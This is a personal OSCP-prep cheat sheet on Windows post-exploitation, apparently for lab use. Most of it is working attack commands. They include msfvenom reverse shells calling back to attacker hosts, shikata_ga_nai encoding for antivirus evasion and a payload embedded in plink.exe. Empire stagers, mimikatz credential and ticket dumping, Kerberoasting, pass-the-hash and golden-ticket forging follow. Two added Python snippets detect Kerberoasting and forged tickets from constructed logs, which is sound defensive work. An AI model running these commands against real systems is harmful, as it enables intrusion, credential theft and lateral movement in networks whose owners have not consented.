OSCP notes dump: #POSTEXPLOIT-WIN


Attacking the Windows OS as a former Debian Administrator was quite a new challenge for me. However, it is important to dive into the field of Windows exploitation because it is the most used desktop OS worldwide. The following notes are about my OSCP prep for Windows.

metasploit framework

# list all payloads from msfvenom
msfvenom -l payloads 

# basic reverse shell
# windows (the payload is named windows/shell_reverse_tcp, as further down)
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=4444 -f exe -o evil.exe

# linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.210 LPORT=7777 -f py -b "\x20\x00" -v shellcode

# shikata ga nai shell
# with parameter "-f c" for c-like shellcode and
# "EXITFUNC=.." for only exiting the thread and not crashing the whole service.
# "-b" defines bad characters

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.210 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

# set autorunscript after shell execution
set AutoRunScript post/windows/manage/migrate

# narrow-down search
search meterpreter type:payload

# injecting payload into existing PE
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

# generating payload from within msfconsole 
generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

# run module as background job
exploit -j

# list backgrounded jobs
jobs

# attach backgrounded job 
jobs -i 0 

# kill job
kill 0 

# list executable formats
msfvenom -l formats

# shows additional options
show advanced

# encode staged payload // av evasion 
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
exploit -j

# setting up an autorunscript
set AutoRunScript windows/gather/enum_logged_on_users

# changing communication protocol after initial compromise
transport list
transport add -t reverse_tcp -l 10.11.0.4 -p 5555
transport next

# loading modules (meterpreter)
load powershell

# dumping creds // requires "load kiwi"
creds_msv

# pivoting or adding route to session id // outside of meterpreter!
route add 192.168.1.0/24 11

# allowing other applications to tunnel through the pivot 
use auxiliary/server/socks4a
echo "socks4 127.0.0.1 8080" >> /etc/proxychains.conf
proxychains rdesktop 192.168.1.110

# list tokens
use incognito
list_tokens -u

# steal / impersonate available token
impersonate_token sandbox\\Administrator

empire framework

# The Empire listener waits for a call-back. The stager is the payload that gets executed on the target. As a final step, Empire's stager retrieves the agent.

# show active listeners // like multi-handler from metasploit
listeners

# list all available listeners
uselistener <tab><tab>

# set Host for module
set Host <HOST-IP>

# run listener
execute

# create stager
usestager windows/launcher_bat

# assign created listener 
set Listener http

# list available agents
agents

# interact with session
interact <session-name>

## agent usage

# list all available options
help

# show processes
ps

# migrate process
psinject http 3568

# use modules
usemodule <tab> <tab>

# module: situational awareness
usemodule situational_awareness/network/powerview/get_user

mimikatz/kiwi

# allowing mimikatz to tamper with other processes. Only possible with SYSTEM privileges
mimikatz # privilege::debug

# trying to elevate the privilege to SYSTEM
mimikatz # token::elevate

# dumping windows password db (SAM - Security Account Manager)
lsadump::sam

# dump kerberos tickets
kerberos::list /export 

# print tickets
sekurlsa::tickets
(PS C:\> klist)

# print passwords
sekurlsa::logonpasswords

# purge kerberos tickets
purge::kerberos

# invoke cmd
misc::cmd

kerberoasting

Overview:
• get SPNs for an overview
• request a Kerberoast ticket
• crack the ticket that is encrypted with the password of the service account

kerberoasting (attack on service accounts)
1. Requesting a TGS ticket from the KDC that is encrypted with the password hash of the service account // SPN necessary

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'

2. Dumping the ticket with mimikatz/kiwi in the context of a local administrator
mimikatz # privilege::debug
mimikatz # kerberos::list /export

3. Cracking the hash with "tgsrepcrack.py" (alternatives: hashcat or john)
python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt 1-40a50000-Offsec@HTTP-CorpWebServer.corp.com-CORP.COM.kirbi
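What the procedure above leaves behind on the domain controller is a TGS request event (4769) for an RC4-encrypted ticket, so here is a detection written from the defender's side. This is an added example, not part of the original notes; the 4769 records and the account names are constructed, and the 5-minute / 3-service threshold is an assumed tuning value.

```python
"""Flag possible Kerberoasting in Windows Security event 4769 records.

Added example, not part of the original notes. An RC4 ticket (encryption
type 0x17) for a service that runs under a user account is the classic
trace, especially several of them from one account in a short time.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 sample reduced to the relevant fields. "service" is the
# ServiceName field, i.e. the account the SPN is registered to.
SAMPLE_4769 = [
    {"time": "2024-05-01T10:00:01", "account": "offsec@CORP.COM",
     "service": "iis_service", "enc": "0x17"},
    {"time": "2024-05-01T10:00:02", "account": "offsec@CORP.COM",
     "service": "sql_svc", "enc": "0x17"},
    {"time": "2024-05-01T10:00:02", "account": "offsec@CORP.COM",
     "service": "backup_svc", "enc": "0x17"},
    {"time": "2024-05-01T10:00:03", "account": "offsec@CORP.COM",
     "service": "FS01$", "enc": "0x12"},
    {"time": "2024-05-01T11:30:00", "account": "j_admin@CORP.COM",
     "service": "krbtgt", "enc": "0x12"},
]

def is_roastable_request(ev):
    """RC4 TGS for a user-account service (not krbtgt, not a machine
    account, which ends in '$')."""
    svc = ev["service"]
    return (ev["enc"].lower() == "0x17"
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))

def kerberoast_alerts(events, window=timedelta(minutes=5), min_services=3):
    """Return {account: [services]} for accounts that requested RC4 tickets
    for at least min_services distinct user-account services inside one
    window (assumed threshold). Events are assumed to be sorted by time."""
    per_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["account"]].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = {}
    for account, reqs in per_account.items():
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                alerts[account] = sorted(services)
                break
    return alerts
```

Legitimate RC4 requests still exist in domains that have not disabled RC4, so the burst threshold matters more than the single encryption-type match.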

pass-the-hash (pth)

# passing the hash and getting rce
pth-winexe -U offsec%aad3b4YYYYYYYYYYYYYYYYYYYYYYYYYYYY5e //10.11.0.22 cmd

# overpassing the hash
# The essence of the overpass-the-hash technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication. A simple way to do this is again with the sekurlsa::pth command from mimikatz.
mimikatz # sekurlsa::pth /user:j_admin /domain:corp.com /ntlm:e2b47YYYYYYYYYYYYYYYYYY66c327 /run:PowerShell.exe
PS> net use \\dc01
PS> klist
PS> .\PsExec.exe \\dc01 cmd.exe
# PsExec doesn't accept password hashes; it uses the Kerberos tickets of the current session instead. Since we operate in the context of the admin, we may reuse the TGT to obtain code execution on the domain controller.

silver tickets

Attack synopsis:
• Attacker obtains the NTLM password hash of a service account (e.g. via Kerberoasting)
• Using mimikatz, the attacker creates a forged TGS ticket (Silver Ticket) using the NTLM hash of the service account.
• The attacker uses this ticket to access a specific service on the target host, bypassing any communication with Active Directory domain controllers.
• The attacker is able to forge the Privilege Attribute Certificate (PAC) and other information as part of the Silver Ticket
YT: Stealthbits

selfmade TGT or golden tickets

# extracting the krbtgt hash with mimikatz
mimikatz # lsadump::lsa /patch 

# delete existing kerberos tickets
mimikatz # kerberos::purge

# injecting golden ticket into memory // can be performed even from computers that aren't joined to the domain
kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1234324243243243-2342432432 /krbtgt:7234324324245322355325325265 /ptt

# conduct lateral movement
psexec.exe \\dc01 cmd.exe
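A golden ticket for a made-up principal like /user:fakeuser above still has to be presented to the DC to get service tickets, so the account name in those 4769 events can be checked against a directory export. This is an added example, not part of the original notes; the directory snapshot, realm and events are constructed.

```python
"""Flag Kerberos TGS requests from accounts the directory does not know.

Added example, not part of the original notes. A forged TGT can name any
principal, but the DC still logs the TGS requests (event 4769), so a name
that does not exist in AD, or a realm that is not ours, is a strong lead.
"""

# Constructed stand-in for an export of the domain's real accounts.
KNOWN_ACCOUNTS = {"administrator", "j_admin", "offsec", "krbtgt", "dc01$"}
EXPECTED_REALM = "CORP.COM"  # assumed realm of the monitored domain

# Constructed 4769 events reduced to the relevant fields.
SAMPLE_4769 = [
    {"id": 1, "account": "j_admin@CORP.COM", "service": "DC01$"},
    {"id": 2, "account": "fakeuser@CORP.COM", "service": "DC01$"},
    {"id": 3, "account": "OFFSEC@CORP.COM", "service": "sql_svc"},
    {"id": 4, "account": "j_admin@EVIL.LOCAL", "service": "DC01$"},
    {"id": 5, "account": "Administrator", "service": "krbtgt"},
]

def split_principal(principal):
    """'name@REALM' -> ('name', 'REALM'); a missing realm yields ''."""
    name, _, realm = principal.partition("@")
    return name, realm.upper()

def forged_ticket_alerts(events, known=KNOWN_ACCOUNTS, realm=EXPECTED_REALM):
    """Return (event id, reason) pairs for requests that cannot stem from a
    normal logon: the account is unknown, or the realm is not ours.
    Requests without a realm suffix are taken to be from our own realm."""
    alerts = []
    for ev in events:
        name, ev_realm = split_principal(ev["account"])
        if name.lower() not in known:
            alerts.append((ev["id"], "account not in directory"))
        elif ev_realm and ev_realm != realm:
            alerts.append((ev["id"], "unexpected realm"))
    return alerts
```

Pair this with a regular refresh of the account export; a stale list turns every new hire into a false positive.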